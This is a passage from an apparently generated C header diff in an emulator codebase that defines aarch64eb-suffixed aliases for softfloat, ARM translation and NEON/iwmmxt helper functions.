floatx80_sub floatx80_sub_aarch64eb +#define floatx80ToCommonNaN floatx80ToCommonNaN_aarch64eb +#define floatx80_to_float128 floatx80_to_float128_aarch64eb +#define floatx80_to_float32 floatx80_to_float32_aarch64eb +#define floatx80_to_float64 floatx80_to_float64_aarch64eb +#define floatx80_to_int32 floatx80_to_int32_aarch64eb +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_aarch64eb +#define floatx80_to_int64 floatx80_to_int64_aarch64eb +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_aarch64eb +#define floatx80_unordered floatx80_unordered_aarch64eb +#define floatx80_unordered_quiet floatx80_unordered_quiet_aarch64eb +#define flush_icache_range flush_icache_range_aarch64eb +#define format_string format_string_aarch64eb +#define fp_decode_rm fp_decode_rm_aarch64eb +#define frame_dummy frame_dummy_aarch64eb +#define free_range free_range_aarch64eb +#define fstat64 fstat64_aarch64eb +#define futex_wait futex_wait_aarch64eb +#define futex_wake futex_wake_aarch64eb +#define gen_aa32_ld16s gen_aa32_ld16s_aarch64eb +#define gen_aa32_ld16u gen_aa32_ld16u_aarch64eb +#define gen_aa32_ld32u gen_aa32_ld32u_aarch64eb +#define gen_aa32_ld64 gen_aa32_ld64_aarch64eb +#define gen_aa32_ld8s gen_aa32_ld8s_aarch64eb +#define gen_aa32_ld8u gen_aa32_ld8u_aarch64eb +#define gen_aa32_st16 gen_aa32_st16_aarch64eb +#define gen_aa32_st32 gen_aa32_st32_aarch64eb +#define gen_aa32_st64 gen_aa32_st64_aarch64eb +#define gen_aa32_st8 gen_aa32_st8_aarch64eb +#define gen_adc gen_adc_aarch64eb +#define gen_adc_CC gen_adc_CC_aarch64eb +#define gen_add16 gen_add16_aarch64eb +#define gen_add_carry gen_add_carry_aarch64eb +#define gen_add_CC gen_add_CC_aarch64eb +#define gen_add_datah_offset gen_add_datah_offset_aarch64eb +#define gen_add_data_offset gen_add_data_offset_aarch64eb +#define gen_addq gen_addq_aarch64eb +#define gen_addq_lo gen_addq_lo_aarch64eb +#define gen_addq_msw gen_addq_msw_aarch64eb +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_aarch64eb +#define gen_arm_shift_im gen_arm_shift_im_aarch64eb +#define gen_arm_shift_reg gen_arm_shift_reg_aarch64eb +#define gen_bx gen_bx_aarch64eb +#define gen_bx_im gen_bx_im_aarch64eb +#define gen_clrex gen_clrex_aarch64eb +#define generate_memory_topology generate_memory_topology_aarch64eb +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_aarch64eb +#define gen_exception gen_exception_aarch64eb +#define gen_exception_insn gen_exception_insn_aarch64eb +#define gen_exception_internal gen_exception_internal_aarch64eb +#define gen_exception_internal_insn gen_exception_internal_insn_aarch64eb +#define gen_exception_return gen_exception_return_aarch64eb +#define gen_goto_tb gen_goto_tb_aarch64eb +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_aarch64eb +#define gen_helper_add_saturate gen_helper_add_saturate_aarch64eb +#define gen_helper_add_setq gen_helper_add_setq_aarch64eb +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_aarch64eb +#define gen_helper_clz32 gen_helper_clz32_aarch64eb +#define gen_helper_clz64 gen_helper_clz64_aarch64eb +#define gen_helper_clz_arm gen_helper_clz_arm_aarch64eb +#define gen_helper_cpsr_read gen_helper_cpsr_read_aarch64eb +#define gen_helper_cpsr_write gen_helper_cpsr_write_aarch64eb +#define gen_helper_crc32_arm gen_helper_crc32_arm_aarch64eb +#define gen_helper_crc32c gen_helper_crc32c_aarch64eb +#define gen_helper_crypto_aese gen_helper_crypto_aese_aarch64eb +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_aarch64eb +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_aarch64eb +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_aarch64eb +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_aarch64eb +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_aarch64eb +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_aarch64eb +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_aarch64eb +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_aarch64eb +#define gen_helper_double_saturate gen_helper_double_saturate_aarch64eb +#define gen_helper_exception_internal gen_helper_exception_internal_aarch64eb +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_aarch64eb +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_aarch64eb +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_aarch64eb +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_aarch64eb +#define gen_helper_get_user_reg gen_helper_get_user_reg_aarch64eb +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_aarch64eb +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_aarch64eb +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_aarch64eb +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_aarch64eb +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_aarch64eb +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_aarch64eb +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_aarch64eb +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_aarch64eb +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_aarch64eb +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_aarch64eb +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_aarch64eb +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_aarch64eb +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_aarch64eb +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_aarch64eb +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_aarch64eb +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_aarch64eb +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_aarch64eb +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_aarch64eb +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_aarch64eb +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_aarch64eb +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_aarch64eb +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_aarch64eb +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_aarch64eb +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_aarch64eb +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_aarch64eb +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_aarch64eb +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_aarch64eb +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_aarch64eb +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_aarch64eb +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_aarch64eb +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_aarch64eb +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_aarch64eb +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_aarch64eb +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_aarch64eb +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_aarch64eb +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_aarch64eb +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_aarch64eb +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_aarch64eb +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_aarch64eb +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_aarch64eb +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_aarch64eb +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_aarch64eb +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_aarch64eb +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_aarch64eb +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_aarch64eb +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_aarch64eb +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_aarch64eb +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_aarch64eb +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_aarch64eb +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_aarch64eb +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_aarch64eb +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_aarch64eb +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_aarch64eb +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_aarch64eb +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_aarch64eb +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_aarch64eb +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_aarch64eb +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_aarch64eb +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_aarch64eb +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_aarch64eb +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_aarch64eb +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_aarch64eb +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_aarch64eb +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_aarch64eb +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_aarch64eb +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_aarch64eb +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_aarch64eb +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_aarch64eb +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_aarch64eb +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_aarch64eb +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_aarch64eb +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_aarch64eb +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_aarch64eb +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_aarch64eb +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_aarch64eb +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_aarch64eb +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_aarch64eb +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_aarch64eb +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_aarch64eb +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_aarch64eb +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_aarch64eb +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_aarch64eb +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_aarch64eb +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_aarch64eb +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_aarch64eb +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_aarch64eb +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_aarch64eb +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_aarch64eb +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_aarch64eb +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_aarch64eb +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_aarch64eb +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_aarch64eb +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_aarch64eb +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_aarch64eb +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_aarch64eb +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_aarch64eb +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_aarch64eb +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_aarch64eb +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_aarch64eb +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_aarch64eb +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_aarch64eb +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_aarch64eb +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_aarch64eb +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_aarch64eb +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_aarch64eb +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_aarch64eb +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_aarch64eb +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_aarch64eb +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_aarch64eb +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_aarch64eb +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_aarch64eb +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_aarch64eb +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_aarch64eb +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_aarch64eb +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_aarch64eb +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_aarch64eb +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_aarch64eb +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_aarch64eb +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_aarch64eb +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_aarch64eb +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_aarch64eb +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_aarch64eb +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_aarch64eb +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_aarch64eb +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_aarch64eb +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_aarch64eb +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_aarch64eb +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_aarch64eb +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_aarch64eb +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_aarch64eb +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_aarch64eb +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_aarch64eb +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_aarch64eb +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_aarch64eb +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_aarch64eb +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_aarch64eb +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_aarch64eb +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_aarch64eb +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_aarch64eb +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_aarch64eb +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_aarch64eb +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_aarch64eb +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_aarch64eb +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_aarch64eb +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_aarch64eb +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_aarch64eb +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_aarch64eb +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_aarch64eb +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_aarch64eb +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_aarch64eb +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_aarch64eb +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_aarch64eb +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_aarch64eb +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_aarch64eb +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_aarch64eb +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_aarch64eb +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_aarch64eb +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_aarch64eb +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_aarch64eb +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_aarch64eb +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_aarch64eb +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_aarch64eb +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_aarch64eb +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_aarch64eb +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_aarch64eb +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_aarch64eb +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_aarch64eb +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_aarch64eb +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_aarch64eb +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_aarch64eb +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_aarch64eb +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_aarch64eb +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_aarch64eb +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_aarch64eb +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_aarch64eb +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_aarch64eb +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_aarch64eb +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_aarch64eb +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_aarch64eb +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_aarch64eb +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_aarch64eb +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_aarch64eb +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_aarch64eb +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_aarch64eb +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_aarch64eb +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_aarch64eb +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_aarch64eb +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_aarch64eb +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_aarch64eb +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_aarch64eb +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_aarch64eb +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_aarch64eb +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_aarch64eb +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_aarch64eb +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_aarch64eb +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_aarch64eb +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_aarch64eb +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_aarch64eb +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_aarch64eb +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_aarch64eb +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_aarch64eb +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_aarch64eb +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_aarch64eb +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_aarch64eb +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_aarch64eb +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_aarch64eb +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_aarch64eb +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_aarch64eb +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_aarch64eb +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_aarch64eb +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_aarch64eb +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_aarch64eb +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_aarch64eb +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_aarch64eb +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_aarch64eb +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_aarch64eb +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_aarch64eb +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_aarch64eb +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_aarch64eb +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_aarch64eb +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_aarch64eb +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_aarch64eb +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_aarch64eb +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_aarch64eb +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_aarch64eb +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_aarch64eb +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_aarch64eb +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_aarch64eb +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_aarch64eb +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_aarch64eb +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_aarch64eb +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_aarch64eb +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_aarch64eb +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_aarch64eb +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_aarch64eb +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_aarch64eb +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_aarch64eb +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_aarch64eb +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_aarch64eb +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_aarch64eb +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_aarch64eb +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_aarch64eb +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_aarch64eb +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_aarch64eb +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_aarch64eb +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_aarch64eb +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_aarch64eb +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_aarch64eb +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_aarch64eb +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_aarch64eb +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_aarch64eb +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_aarch64eb +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_aarch64eb +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_aarch64eb +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_aarch64eb +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_aarch64eb +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_aarch64eb +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_aarch64eb +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_aarch64eb +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_aarch64eb +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_aarch64eb +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_aarch64eb +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_aarch64eb +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_aarch64eb +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_aarch64eb +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_aarch64eb +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_aarch64eb +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_aarch64eb +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_aarch64eb +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_aarch64eb +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_aarch64eb +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_aarch64eb +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_aarch64eb +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_aarch64eb +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_aarch64eb +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_aarch64eb +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_aarch64eb +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_aarch64eb +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_aarch64eb +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_aarch64eb +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_aarch64eb +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_aarch64eb +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_aarch64eb +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_aarch64eb +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_aarch64eb +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_aarch64eb +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_aarch64eb +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_aarch64eb +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_aarch64eb +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_aarch64eb +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_aarch64eb +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_aarch64eb +#define gen_helper_neon_tbl gen_helper_neon_tbl_aarch64eb +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_aarch64eb +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_aarch64eb +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_aarch64eb +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_aarch64eb +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_aarch64eb +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_aarch64eb +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_aarch64eb +#define gen_helper_neon_unzip8 